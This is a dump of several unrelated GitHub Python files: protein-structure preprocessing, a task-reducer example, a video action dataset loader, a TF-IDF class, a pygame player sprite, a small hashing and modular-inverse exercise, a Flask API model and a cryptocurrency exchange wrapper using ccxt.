i//t, l, y_s]\r\n else:\r\n j = [i//t, l, x_s, l]\r\n if i < max(x_s, y_s) - remainder:\r\n draw_dot(x + j[0] * x_r, y + j[1] * y_r, dot1, z_s*l/dis_c, l/dis_c, array)\r\n else:\r\n draw_dot(x + j[2] * x_r, y + j[3] * y_r, dot1, z_s*l/dis_c, l/dis_c, array)\r\n\r\n\r\ndef draw_connection(atoms, array, rec):\r\n site = {}\r\n for (x, y) in rec.keys():\r\n site.update({rec[(x, y)]: [x, y]})\r\n for i in range(len(atoms) - 1):\r\n dots_connection(atoms[i], atoms[i + 1], array, site)\r\n\r\n\r\ndef write_log(path):\r\n arg_name_list = ['dataset', 'resolution', 'input_type', 'output_type', 'axis_range', 'multi_atom',\r\n 'move2center', 'redistribute', 
'redistribute_rate', 'relative_number', 'draw_connection',\r\n 'aminoacid_message']\r\n arg_list = [args.dataset, args.resolution, args.input_type, args.output_type, args.axis_range, args.multi_atom,\r\n args.move2center, args.redistribute, args.redistribute_rate, args.relative_number, args.draw_connection,\r\n args.aminoacid_message]\r\n write_list = [time.strftime(\"%Y%m%d_%H%M\", time.localtime())]\r\n for i in range(len(arg_name_list)):\r\n print(\"%s = %s\" % (arg_name_list[i], str(arg_list[i])))\r\n write_list.append(\"%s = %s\" % (arg_name_list[i], str(arg_list[i])))\r\n write_list.append('\\n\\n\\n')\r\n with open(path + '/args_log.txt', 'a') as log_writer:\r\n log_writer.write('\\n'.join(write_list))\r\n\r\n\r\ndef process():\r\n log_dir = args.output_path + '/' + args.dataset\r\n output_dir = args.output_path + '/' + args.dataset + '/' + time.strftime(\"%Y%m%d_%H%M\", time.localtime())\r\n pathlib.Path(output_dir).mkdir(parents=True, exist_ok=True)\r\n write_log(log_dir)\r\n num = 0\r\n if args.output_type == 'image':\r\n if args.redistribute:\r\n atoms_dic = {}\r\n xs = []\r\n ys = []\r\n for filename in os.listdir(input_folder):\r\n atoms = relocate(extract_message(readfile(filename, input_folder), args.input_type))\r\n if args.move2center:\r\n atoms = move2center(atoms)\r\n for atom in atoms:\r\n xs.append(atom.x)\r\n ys.append(atom.y)\r\n atoms_dic.update({filename: atoms})\r\n # var_sta = max(np.var(xs), np.var(ys))\r\n else:\r\n for filename in os.listdir(input_folder):\r\n atoms = relocate(extract_message(readfile(filename, input_folder), args.input_type))\r\n if args.move2center:\r\n atoms = move2center(atoms)\r\n for i in range(len(atoms)):\r\n atoms[i].z=(atoms[i].z+64.)*2.-2.\r\n if args.draw_connection:\r\n array, rec = arraylize(atoms, ary_dim)\r\n draw_connection(atoms, array, rec)\r\n else:\r\n array, _ = arraylize(atoms, ary_dim)\r\n if args.relative_number:\r\n array[:, :, 1] /= (len(atoms) + 1)\r\n output_name = filename.replace('.cif', '.npy')\r\n\r\n np.save(output_dir + '/' + output_name, array)\r\n # break\r\n # matplotlib.image.imsave(output_dir + '/' + output_name.replace('.npy', '.png'), array)\r\n # num += 1\r\n # if num == 10:\r\n # break\r\n elif args.output_type == 'distance_map':\r\n if args.multi_atom:\r\n for filename in os.listdir(input_folder):\r\n atoms = extract_message(readfile(filename, input_folder), args.input_type)\r\n\r\n\r\nif __name__ == '__main__':\r\n print('Parent process %s.' 
% os.getpid())\r\n    p = Pool(3)\r\n    # pass the callable itself: apply_async(process()) would run process in the parent and submit its None return value\r\n    p.apply_async(process)\r\n    print('Waiting for all subprocesses done...')\r\n    p.close()\r\n    p.join()\r\n    print('All subprocesses done.')\r\n\r\n","repo_name":"ElvinJun/DeepPBS","sub_path":"transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":19477,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"}
{"seq_id":"41887868107","text":"from random import random\nfrom time import sleep\n\nimport logging\nlog = logging.getLogger(__name__)\n\nfrom freactor import Freactor, StatusCode, freducer\n\nSUCCESS = StatusCode.SUCCESS\nFAILURE = StatusCode.FAILURE\nRETRY = StatusCode.RETRY\nABORT = StatusCode.ABORT\n\n@freducer(3, 1)\ndef s1(t_data):\n    log.info('s1 running...')\n    log.info(t_data)\n    sleep(1)\n    r = random()\n    if r < 0.9:\n        return StatusCode.SUCCESS, {'s1': 1}, 's1 general success'\n    else:\n        return StatusCode.ABORT, {'s1': 1}, 's1 fail, abort'\n\n\n@freducer()\ndef s2(t_data): # cleanup step of s1\n    log.info('s2 running...')\n    log.info(t_data)\n    sleep(1)\n    r = random()\n    if r < 0.9:\n        return StatusCode.SUCCESS, {'s2': 2}, 's2 general success'\n    else:\n        raise Exception('Woo! s2 raised!')\n\n\n@freducer(3, 1)\ndef s3(t_data):\n    log.info('s3 running...')\n    log.info(t_data)\n    sleep(1)\n    r = random()\n    if r < 0.3:\n        return StatusCode.SUCCESS, {'s3': 1}, 's3 general success'\n    else:\n        raise Exception('Woo! s3 raised!')\n\n\n@freducer()\ndef s4(t_data): # cleanup step of s3\n    log.info('s4 running...')\n    log.info(t_data)\n    sleep(1)\n    r = random()\n    if r < 0.9:\n        return StatusCode.SUCCESS, {'s4': 4}, 's4 general success'\n    else:\n        raise Exception('Woo! s4 raised!')\n\n\n@freducer()\ndef s5(t_data):\n    log.info('s5 running...')\n    log.info(t_data)\n    sleep(1)\n    r = random()\n    if r < 0.2:\n        return StatusCode.SUCCESS, {'s5': 5}, 's5 general success'\n    else:\n        raise Exception('Woo! 
s5 raised!')\n\n","repo_name":"Pro-YY/freactor","sub_path":"examples/example-reducers/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"41978814312","text":"\n#import datasets\nimport os\nfrom numpy.random import randint\nimport random\nimport numpy as np\nimport cv2 \n\nfrom cv2 import imread\nimport torch.utils.data\nfrom torch.utils.data import Dataset\n\nact2id = {\n \"BG\": 0, # background\n \"Diving\": 1,\n \"Golf\": 2,\n \"Kicking\": 3,\n \"Lifting\": 4,\n \"Riding\": 5,\n \"Run\":6,\n \"SkateBoarding\":7,\n \"Swing1\":8,\n \"Swing2\":9,\n \"Walk\":10\n}\n\n\n\nclass VideoRecord(object):\n def __init__(self, row):\n self._data = row\n\n @property\n def path(self):\n return self._data[0]\n\n @property\n def num_frames(self):\n return int(self._data[1])\n \n @property\n def labels(self):\n return self._data[2]\n\nclass ucfsports(Dataset):\n def __init__(self,cfg, image_set, PHASE = 'train',num_segments = 8,interval = 3,dense_sample = False,\n uniform_sample=True,random_sample = False,strided_sample = False, is_input_sampling = True,\n pathway ='two_pathway',transform= None):\n \n self.cfg = cfg\n self.interval = interval\n self.pathway = pathway\n self.num_segments = num_segments\n self.dense_sample = dense_sample\n self.uniform_sample = uniform_sample\n self.random_sample= random_sample\n self.strided_sample = strided_sample\n self.is_input_sampling = is_input_sampling\n self.num_classes = cfg.UCFSPORT.NUM_CLASSES\n self.framelist = cfg.UCFSPORT.FRAME_LIST_DIR\n self.transform = transform\n \n if PHASE=='train':\n self.list_file = self.framelist + 'train_list.txt' # you need a full path for image list and data path\n else:\n self.list_file = self.framelist + 'test_list.txt'\n\n self._annot_path = cfg.UCFSPORT.ANNOTATION_DIR # you only have annotations in RGB data folder\n self._data_path = cfg.UCFSPORT.FRAME_DIR\n self._classes = ('__background__', \n 'Diving', 'Golf', 'Kicking', 'Lifting', 'Riding', \n 'Run', 'SkateBoarding', 'Swing1', 'Swing2', 'Walk')\n\n self._class_to_ind = dict(zip(self._classes, range(self.num_classes)))\n self._parse_list()\n \n def _parse_list(self):\n \"\"\"\n Parse the video info from the list file\n \"\"\"\n frame_path = [x.strip().split(' ') for x in open(self.list_file)] \n self.video_list = [VideoRecord(item) for item in frame_path]\n print('Sequence number/ video number:%d' % (len(self.video_list)))\n \n def _sample_indices(self, record):\n \"\"\"\n :param record: VideoRecord\n :return: list\n \"\"\"\n if self.dense_sample: # i3d dense sample\n sample_pos = max(1, 1 + record.num_frames - 64)\n t_stride = 64 // self.num_segments\n start_idx = 0 if sample_pos == 1 else np.random.randint(0, sample_pos - 1)\n offsets = [(idx * t_stride + start_idx) % record.num_frames for idx in range(self.num_segments)]\n return np.array(offsets)+1\n elif self.uniform_sample: # normal sample\n average_duration = (record.num_frames) // self.num_segments\n if self.pathway == \"two_pathway\":\n if record.num_frames < 80:\n offsets = np.multiply(list(range(self.num_segments)), average_duration)+average_duration\n assert offsets[-1] <= record.num_frames\n return offsets\n else:\n mid_frame_ind = record.num_frames // 2\n offsets = list(range(mid_frame_ind - 12, mid_frame_ind + 12, 3))\n return offsets\n else:\n if average_duration > 0:\n offsets = np.multiply(list(range(self.num_segments)), average_duration) + randint(average_duration,\n 
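# randint adds a random offset in [0, average_duration) to each evenly spaced index,\n                                                                                              # so repeated epochs sample different frames from within each segment\n                                                                                              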
size=self.num_segments)\n return offsets+1\n\n elif self.random_sample:\n offsets = np.sort(randint(record.num_frames + 1, size=self.num_segments))\n return offsets+1 \n elif self.strided_sample:\n average_duration = (record.num_frames) // self.num_segments\n if average_duration > 0:\n offsets = np.multiply(list(range(self.num_segments)), average_duration) + average_duration//2\n return offsets+1\n else:\n offsets = np.zeros((self.num_segments,)) \n return offsets+1 \n \n def get_all_frames(self,index,record):\n #initialise the gt,num_boxes,im_info and one hot labels\n gt = np.zeros((self.num_segments,self.cfg.MAX_NUM_GT_BOXES,(self.num_classes + 4)),\n dtype=np.float32)\n num_boxes = np.ones((self.num_segments),dtype=np.float32)\n im_info = np.zeros((self.num_segments,3),dtype=np.float32)\n one_hot_labels = np.zeros((self.num_classes),dtype = np.float)\n count = 0 #to traverse between the segments\n\n #get the imageindex and labels from the framelist \n im_split = (record.path).split('/')\n num_parts = len(im_split)\n im_ind = int(im_split[num_parts-1][0:6])\n\n #get the class label and convert to one hot\n class_label_id = act2id[record.labels]\n one_hot_labels[class_label_id] = 1\n \n #annotation file and image folder to get the clips\n ann_file =self._annot_path +im_split[5]+ '.txt'\n Lines = open(ann_file, 'r').readlines()\n img_folder = os.path.join(self._data_path, im_split[5])\n max_num = len(os.listdir(img_folder)) - 1\n \n clip = []\n\n d = self.interval\n path = []\n for i in reversed(range(self.num_segments)):\n # make it as a loop\n i_temp = im_ind - i * d\n while i_temp < 1:\n i_temp = max_num + i_temp\n while i_temp > max_num:\n i_temp = i_temp - max_num\n path.append(i_temp)\n \n #prepare the image/frame\n path_tmp = self._data_path + '/'+im_split[5]+'/'+('{:06d}.jpg'.format(i_temp))\n #print(\"image split0:{0} imagesplit1: {1} frameindex: {2}\\n\".format(im_split[0], im_split[1] ,'{:05d}.png'.format(i_temp)))\n #print(\"maximum_frames : {}\".format(max_num))\n #print(path_tmp)\n im = imread(path_tmp)\n if im is None:\n print(\"caught\")\n im = im[:,:,::-1].astype(np.float32, copy=False) #RGB\n height,width,_= im.shape \n im_scale = float(self.cfg.TRAIN.TRIM_HEIGHT) / float(self.cfg.TRAIN.TRIM_WIDTH)\n im = cv2.resize(im, (400,300), fx=im_scale, fy=im_scale,\n interpolation=cv2.INTER_LINEAR)\n im_scale1 = float(self.cfg.TRAIN.TRIM_HEIGHT) / height\n im_scale2 = float(self.cfg.TRAIN.TRIM_WIDTH) / width\n im_info[count,:]=im.shape[0],im.shape[1],im_scale\n \n #prepare the gt boxes \n if len(Lines[0].split()) == 5:\n # gt boxes and labels per image\n x,y,w,h = [line.strip().split()[1:] for line in Lines if int((str(line).split())[0]) == im_ind][0]\n x2 = int(x)+ int(w)\n y2 = int(y) + int(h)\n y,y2 = int(y)*im_scale1,y2*im_scale1\n x,x2 = int(x)*im_scale2,x2*im_scale2\n gt[count,0,:4] = int(x),int(y),x2,y2\n gt[count,0,4:] = one_hot_labels\n else : \n data1 =[(line.split())[1:5] for line in Lines if int((str(line).split())[0]) == im_ind][0]\n xf,yf,wf,hf = [int(tup) for tup in data1]\n data2 =[(line.split())[5:] for line in Lines if int((str(line).split())[0]) == im_ind][0]\n xs,ys,ws,hs = [int(tup) for tup in data2]\n gt[count,0,:4]= xf*im_scale2,yf*im_scale1,(wf+xf)*im_scale2,(yf+hf)*im_scale1\n gt[count,1,:4]= xs*im_scale2,ys*im_scale1,(ws+xs)*im_scale2,(ys+hs)*im_scale1\n num_boxes[count] *= 2\n gt[count,:,4:] = one_hot_labels\n #gt[count,:,:4] = gt[count,:,:4]*im_scale\n count += 1\n clip.append(im)\n \n max_shape = np.array([imz.shape for imz in clip]).max(axis=0)\n blob 
= np.zeros((len(clip), max_shape[0], max_shape[1], 3),\n dtype=np.float32)\n for i in range(len(clip)):\n blob[i,0:clip[i].shape[0], 0:clip[i].shape[1], :] = clip[i]\n\n process_data = self.transform(blob)\n return process_data,gt,num_boxes,im_info\n \n \n\n #def get(self,index,record,indices,num_segments):\n def get_input_keyframe(self,record,indices):\n \"\"\"\n Extract the gt boxes,labels from the file list\n \"\"\"\n video_id = str(record.path).strip().split('/Frames/')[1]\n ann_file = self._annot_path + video_id +'.txt' \n \n \n gt = np.zeros((self.num_segments,self.cfg.MAX_NUM_GT_BOXES,(self.num_classes + 4)),\n dtype=np.float32)\n num_boxes = np.ones((self.num_segments),dtype=np.float32)\n im_info = np.zeros((self.num_segments,3),dtype=np.float32)\n \n one_hot_labels = np.zeros((self.num_classes),dtype = np.float)\n count = 0\n images =[]\n\n labels = open(self.list_file, 'r').readlines()\n class_label =self._class_to_ind[([label.split()[2] for label in labels if label.split()[0].split('/Frames/')[1] == video_id])[0]]\n one_hot_labels[class_label] = 1\n Lines = open(ann_file, 'r').readlines() \n \n for seg_ind in indices:\n\n #image information \n image_path = os.path.join(record.path, '{:06d}.jpg'.format(seg_ind))\n im = imread(image_path)\n im = im[:,:,::-1].astype(np.float32, copy=False) #RGB\n height,width,_= im.shape \n im_size_min= min(height,width)\n im_size_max=max(height,width)\n #im_scale1 = float(self.cfg.TRAIN.TRIM_HEIGHT) / float(im_size_min)\n #im_scale2 = float(self.cfg.TRAIN.TRIM_WIDTH) / float(im_size_max)\n im_scale = float(self.cfg.TRAIN.TRIM_HEIGHT) / float(self.cfg.TRAIN.TRIM_WIDTH)\n im = cv2.resize(im, (400,300), fx=im_scale, fy=im_scale,\n interpolation=cv2.INTER_LINEAR)\n im_scale1 = float(self.cfg.TRAIN.TRIM_HEIGHT) / height\n im_scale2 = float(self.cfg.TRAIN.TRIM_WIDTH) / width\n \n #im = cv2.resize(im, None, None, fx=im_scale1, fy=im_scale2,\n # interpolation=cv2.INTER_LINEAR)\n im_info[count,:]=self.cfg.TRAIN.TRIM_HEIGHT,len(im[2]),im_scale\n if len(Lines[0].split()) == 5:\n # gt boxes and labels per image\n x,y,w,h = [line.strip().split()[1:] for line in Lines if int((str(line).split())[0]) == seg_ind][0]\n x2 = int(x)+ int(w)\n y2 = int(y) + int(h)\n y,y2 = int(y)*im_scale1,y2*im_scale1\n x,x2 = int(x)*im_scale2,x2*im_scale2\n gt[count,0,:4] = int(x),int(y),x2,y2\n gt[count,0,4:] = one_hot_labels\n else : \n data1 =[(line.split())[1:5] for line in Lines if int((str(line).split())[0]) == seg_ind][0]\n xf,yf,wf,hf = [int(tup) for tup in data1]\n data2 =[(line.split())[5:] for line in Lines if int((str(line).split())[0]) == seg_ind][0]\n xs,ys,ws,hs = [int(tup) for tup in data2]\n gt[count,0,:4]= xf*im_scale2,yf*im_scale1,(wf+xf)*im_scale2,(yf+hf)*im_scale1\n gt[count,1,:4]= xs*im_scale2,ys*im_scale1,(ws+xs)*im_scale2,(ys+hs)*im_scale1\n num_boxes[count] *= 2\n gt[count,:,4:] = one_hot_labels\n #gt[count,:,:4] = gt[count,:,:4]*im_scale\n count += 1\n images.append(im)\n \n \n max_shape = np.array([imz.shape for imz in images]).max(axis=0)\n blob = np.zeros((len(images), max_shape[0], max_shape[1], 3),\n dtype=np.float32)\n for i in range(len(images)):\n blob[i,0:images[i].shape[0], 0:images[i].shape[1], :] = images[i]\n\n process_data = self.transform(blob)\n return process_data,gt,num_boxes,im_info\n \n def __getitem__(self, index):\n record = self.video_list[index]\n #self.yaml_file(index)\n segment_indices = self._sample_indices(record)\n segment_indices = np.sort(segment_indices)\n '''Changes made here for slowfast'''\n if self.pathway == 
'two_pathway':\n segment_adj_indices = self.get_adj_frames(record,segment_indices)\n #\n return self.two_branch_input(record,segment_indices,segment_adj_indices)\n else:\n return self.get_input_keyframe(record,segment_indices)\n\n def two_branch_input(self,record,segment_indices,segment_adj_indices):\n two_branch_list =[]\n two_branch_list.append(self.get_input_keyframe(record,segment_indices))\n two_branch_list.append(self.get_input_adjframe(record,segment_adj_indices))\n return two_branch_list\n \n def get_input_adjframe(self,record,indices):\n \"\"\"\n Extract the gt boxes,labels from the file list\n \"\"\"\n video_id = str(record.path).strip().split('/Frames/')[1]\n images =[]\n\n for seg_ind in indices:\n\n #image information \n image_path = os.path.join(record.path, '{:06d}.jpg'.format(seg_ind))\n im = imread(image_path)\n im = im[:,:,::-1].astype(np.float32, copy=False) #RGB\n height,width,_= im.shape \n im_size_min= min(height,width)\n im_size_max=max(height,width)\n im_scale = float(self.cfg.TRAIN.TRIM_HEIGHT) / float(self.cfg.TRAIN.TRIM_WIDTH)\n im = cv2.resize(im, (400,300), fx=im_scale, fy=im_scale,\n interpolation=cv2.INTER_LINEAR)\n images.append(im)\n \n \n max_shape = np.array([imz.shape for imz in images]).max(axis=0)\n blob = np.zeros((len(images), max_shape[0], max_shape[1], 3),\n dtype=np.float32)\n for i in range(len(images)):\n blob[i,0:images[i].shape[0], 0:images[i].shape[1], :] = images[i]\n\n process_data = self.transform(blob)\n return process_data\n\n def get_adj_frames(self,record,segment_indices):\n new_adj_indices =[]\n average_duration = (record.num_frames) // self.num_segments\n #if average_duration < 3:\n #if record.num_frames > 80:\n for seg in segment_indices:\n new_adj_indices.append(np.abs(seg-2))\n new_adj_indices.append(np.abs(seg-1))\n new_indices = [1 if i == 0 else i for i in new_adj_indices]\n #else:\n ''''for ind in range(len(segment_indices)):\n if ind == 0:\n new_adj_indices.extend(random.sample(list(range(segment_indices[ind])),2))\n continue\n new_adj_indices.extend(random.sample(list(range(segment_indices[ind-1]+1,segment_indices[ind])),2))\n new_indices = [1 if i == 0 else i for i in new_adj_indices]'''\n\n return new_indices\n\n \n def __len__(self):\n return (len(self.video_list))\n\n def clip_boxes(boxes, im_shape):\n \"\"\"\n Clip boxes to image boundaries.\n \"\"\"\n \n boxes[boxes < 0] = 0\n batch_x = im_shape[:, 1] - 1\n batch_y = im_shape[:, 0] - 1\n\n boxes[:,:,0][boxes[:,:,0] > batch_x] = batch_x\n boxes[:,:,1][boxes[:,:,1] > batch_y] = batch_y\n boxes[:,:,2][boxes[:,:,2] > batch_x] = batch_x\n boxes[:,:,3][boxes[:,:,3] > batch_y] = batch_y\n\n return boxes","repo_name":"TeCSAR-UNCC/S-RAD-ActionLocalizationClassification","sub_path":"S-RAD/dataset_config/UCF_Sports/ucfsports.py","file_name":"ucfsports.py","file_ext":"py","file_size_in_byte":15627,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"10673344732","text":"import math\nimport os\nfrom collections import defaultdict\nfrom textblob import TextBlob\nfrom projects import ROOT\nfrom pandas import DataFrame\n\n\nclass TfIdfException(Exception):\n pass\n\n\nclass TfIdf:\n \"\"\"\n short for term frequency–inverse document frequency,\n is a numerical statistic that is intended to reflect how important a word is\n to a document in a collection or corpus.\n \"\"\"\n\n def __init__(self):\n self.weighted = False\n self.tf = {}\n self.term_counter = defaultdict(int)\n self.idf = defaultdict(int)\n\n def 
get_doc_names(self):\n return self.tf.keys()\n\n def calculate(self, doc_name):\n \"\"\"\n calculate the tf-idf of a document\n :param list_of_words:\n :return:\n \"\"\"\n doc_tf = self.tf.get(doc_name)\n if doc_tf is not None:\n self.calc_idf()\n tf_idf = defaultdict(list)\n for word in doc_tf.keys():\n word_idf = self.idf.get(word)\n word_tf = doc_tf[word]\n tf_idf['word'].append(word)\n tf_idf['tf_idf'].append(word_tf * word_idf)\n return tf_idf\n raise TfIdfException('unknown document number. use the method \"add_document_to_the_corpus\"')\n\n def calc_idf(self):\n total_documents = len(self.tf)\n for term in self.term_counter:\n for doc, word_frequency in self.tf.items():\n if term in word_frequency:\n self.idf[term] += 1\n self.idf.update((x, math.log(total_documents / y)) for x, y in self.idf.items())\n return self.idf\n\n def add_document_to_the_corpus(self, doc_name, text):\n \"\"\"\n :param doc_name: the name of a document / paragraph. we use the number.\n :param text: a list of the words in the document / paragraph\n :return:\n \"\"\"\n words = TextBlob(text).words\n # building a dictionary\n doc_dict = defaultdict(int)\n for word in words:\n doc_dict[word] += 1\n self.term_counter[word] += 1\n # normalizing the dictionary\n length = float(len(words))\n for k in doc_dict:\n doc_dict[k] = doc_dict[k] / length\n\n # add the normalized document to the corpus\n self.tf[doc_name] = doc_dict\n\n\nif __name__ == '__main__':\n # read the file\n corpus_path = os.path.join(ROOT, 'tf-idf', 'alice_munro_voices.txt')\n with open(corpus_path, 'r') as corpus_file:\n corpus = corpus_file.read()\n documents = corpus.splitlines()\n\n # add paragraph per paragraph\n tfidf = TfIdf()\n for i, document in enumerate(documents):\n tfidf.add_document_to_the_corpus(i, document)\n\n tfidf_doc = tfidf.calculate(doc_name=0)\n\n # create a dataframe\n df = DataFrame(tfidf_doc)\n top_words = df.sort_values('tf_idf')[-10:]\n # print the words with the most info\n print('the words with the most information of the first paragraph are: \\n {}'.format(top_words))\n","repo_name":"vincentclaes/datascience","sub_path":"projects/tf-idf/tf-idf.py","file_name":"tf-idf.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73849479411","text":"\nfrom scripts.terrain import BLOCK_SIZE\nfrom scripts.setting import *\nfrom scripts.sprtiesheet import Spritesheet\nfrom scripts.layer import *\n\nPLAYER_SIZE = 96\nPLAYER_WIDTH = 65\nPLAYER_VEL = 4\nDELAY_MOVE = 3\nJUMP = 20\n\nclass Player:\n\n def __init__(self):\n self.stand_right = Spritesheet('media/player_1_standby_right.png').load_spritesheet(PLAYER_SIZE, PLAYER_SIZE)\n self.stand_left = Spritesheet('media/player_1_standby_left.png').load_spritesheet(PLAYER_SIZE, PLAYER_SIZE)\n self.walk_right = Spritesheet('media/player_1_run_right.png').load_spritesheet(PLAYER_SIZE, PLAYER_SIZE)\n self.walk_left = Spritesheet('media/player_1_run_left.png').load_spritesheet(PLAYER_SIZE, PLAYER_SIZE)\n self.jump_right = Spritesheet('media/player_1_jump_right.png').load_spritesheet(PLAYER_SIZE, PLAYER_SIZE)\n self.jump_left = Spritesheet('media/player_1_jump_left.png').load_spritesheet(PLAYER_SIZE, PLAYER_SIZE)\n self.fall_right = Spritesheet('media/player_1_fall_right.png').load_spritesheet(PLAYER_SIZE, PLAYER_SIZE)\n self.fall_left = Spritesheet('media/player_1_fall_left.png').load_spritesheet(PLAYER_SIZE, PLAYER_SIZE)\n\n x = 100\n y = 500\n self.sprite = self.stand_right\n self.rect = 
pygame.Rect(x, y, PLAYER_WIDTH, PLAYER_SIZE)\n self.hitbox_offset_x = (PLAYER_SIZE - PLAYER_WIDTH)//2\n self.maxhealth = 10.0 #set in decimal\n self.health = self.maxhealth\n\n self.dir = 1\n\n self.move_x = 0\n self.moving = False\n self.jumping = 0\n self.gravity = 0\n\n def update(self):\n\n if self.moving:\n if self.move_x > 0:\n self.move_x -= 1\n self.rect.x += PLAYER_VEL\n elif self.move_x < 0:\n self.move_x += 1\n self.rect.x -= PLAYER_VEL\n elif self.move_x == 0:\n self.moving = False\n else:\n if self.dir == -1:\n self.sprite = self.stand_left\n elif self.dir == 1:\n self.sprite = self.stand_right\n \n\n \n if self.jumping > 0:\n self.jumping -= 1\n for i in range(self.jumping):\n self.rect.y -= 1\n if self.dir == -1:\n self.sprite = self.jump_left\n elif self.dir == 1:\n self.sprite = self.jump_right \n\n \n def move_left(self):\n self.move_x = -DELAY_MOVE\n self.moving = True\n if self.jumping == 0:\n self.sprite = self.walk_left \n \n\n def move_right(self): \n self.move_x = DELAY_MOVE\n self.moving = True\n if self.jumping == 0:\n self.sprite = self.walk_right \n \n def fall(self):\n if self.jumping == 0:\n if self.gravity == 0:\n self.gravity = 1\n else:\n if self.gravity <= 7:\n self.gravity += 1\n for i in range(self.gravity):\n self.rect.y += 1\n\n if self.dir == -1:\n self.sprite = self.fall_left\n elif self.dir == 1:\n self.sprite = self.fall_right\n \n\n \n def hit_ground(self):\n self.gravity = 0\n self.rect.bottom = ((ceil((self.rect.bottom + 5)/BLOCK_SIZE) - 1) * BLOCK_SIZE) + 1\n \n def jump(self):\n if self.jumping == 0:\n self.jumping = JUMP \n\n def is_jumping(self):\n return self.jumping > 0\n\n def reset_jump(self):\n self.jumping = 0\n \n def climb_up(self):\n self.rect.y -= 4\n \n def climb_down(self):\n self.rect.y += 4\n \n def draw(self, off_set):\n frame = pygame.time.get_ticks() // 180 % len(self.sprite)\n \n screen.blit(self.sprite[frame], (self.rect.x - self.hitbox_offset_x + off_set[0], self.rect.y + off_set[1]))\n pygame.draw.rect(screen, (255, 255, 255), (self.rect.x + off_set[0], self.rect.y + off_set[1], self.rect.width, self.rect.height), 2)\n","repo_name":"Jiruu246/Platform_Game","sub_path":"scripts/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":4013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35362648851","text":"'''\nfor index1 in range(1, 10):\n for index2 in range(1, 10):\n for index3 in range(1, 10):\n for index4 in range(1, 10):\n for index5 in range(1, 10):\n for index6 in range(1, 10):\n for index7 in range(1, 10):\n for index8 in range(1, 10):\n number_sum_ascii = ord(str(index1))+ord(str(index2))+ord(str(index3))+ord(str(index4))+ord(str(index5))+ord(str(index6))+ord(str(index7))+ord(str(index8))\n the_pass = str(index1)+str(index2)+str(index3)+str(index4)+str(index5)+str(index6)+str(index7)+str(index8)\n if number_sum_ascii%11 == 5:\n print(the_pass, number_sum_ascii,number_sum_ascii%11)\n'''\n\n'''\nlist_mod = \"104,122,104,97,53,53,54,49,50,51,52,53,54,55\".split(\",\")\nresult_list = []\nsum_result = 0\nfor index in range(len(list_mod)):\n list_mod[index] = int(list_mod[index])\nfor index in range(len(list_mod)):\n sum_result += list_mod[index]\nprint(sum_result)\n'''\n\n\n'''\nsame_hash_list = []\nfor index in range(65, 91):\n if index % 11 == 5:\n same_hash_list.append(chr(index))\nprint(same_hash_list)\n'''\n\n\nm = 396\nfor d in range(0, m+1):\n if (283*d)%m == 1:\n 
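# brute-force search for d = 283^(-1) mod m; it exists because gcd(283, m) = 1\n        # (Python 3.8+ can compute the same value directly with pow(283, -1, m))\n        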
print(d)\n","repo_name":"haiqiang-zhang/SoftwareTool_in_UoA","sub_path":"COMPSCI110/ASCII_mod_hash.py","file_name":"ASCII_mod_hash.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"6828083974","text":"from flask_restplus.fields import Integer, Float, String, String as Text, Date, DateTime, Boolean\n\ndef create_model(api):\n model = api.model('rulepackageObjectRel', {\n 'idRulepackageobjectrel': Integer,\n 'idRulepackage': Integer,\n 'idObject': Integer,\n 'errored': Boolean,\n 'synced': Boolean,\n 'syncedAt': DateTime \n },mask='*');\n return model","repo_name":"tunghoang/ips-manager","sub_path":"apis/rulepackageObjectRels/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19921021273","text":"import requests\r\n\r\n\r\nclass ExchangeAPI:\r\n def __init__(self, api_key, secret_key):\r\n self.api_key = api_key\r\n self.secret_key = secret_key\r\n\r\n def get_price(self, symbol):\r\n url = f\"https://api.example.com/price?symbol={symbol}\"\r\n headers = {\"X-MBX-APIKEY\": self.api_key}\r\n response = requests.get(url, headers=headers)\r\n response.raise_for_status()\r\n data = response.json()\r\n return float(data[\"price\"])\r\n\r\n\r\n\r\nimport ccxt\r\n\r\n\r\nclass Exchange:\r\n def __init__(self, exchange_id, api_key, secret_key):\r\n self.exchange_id = exchange_id\r\n self.api_key = api_key\r\n self.secret_key = secret_key\r\n self.exchange = self.get_exchange()\r\n\r\n def get_exchange(self):\r\n exchange_class = getattr(ccxt, self.exchange_id)\r\n exchange = exchange_class({\r\n 'apiKey': self.api_key,\r\n 'secret': self.secret_key,\r\n })\r\n return exchange\r\n\r\n def get_balance(self, symbol):\r\n balance = self.exchange.fetch_balance()[symbol]\r\n return balance\r\n\r\n def create_order(self, symbol, order_type, side, amount, price=None):\r\n order = None\r\n try:\r\n if order_type == 'market':\r\n order = self.exchange.create_order(symbol=symbol, type=order_type, side=side, amount=amount)\r\n elif order_type == 'limit':\r\n order = self.exchange.create_order(symbol=symbol, type=order_type, side=side, amount=amount, price=price)\r\n except Exception as e:\r\n print(f'Error creating order: {e}')\r\n return order\r\n\r\n def cancel_order(self, order_id):\r\n result = None\r\n try:\r\n result = self.exchange.cancel_order(order_id)\r\n except Exception as e:\r\n print(f'Error cancelling order: {e}')\r\n return result\r\n\r\n def get_order(self, order_id):\r\n order = None\r\n try:\r\n order = self.exchange.fetch_order(order_id)\r\n except Exception as e:\r\n print(f'Error getting order: {e}')\r\n return order\r\n\r\n def get_open_orders(self, symbol=None):\r\n orders = []\r\n try:\r\n orders = self.exchange.fetch_open_orders(symbol=symbol)\r\n except Exception as e:\r\n print(f'Error getting open orders: {e}')\r\n return 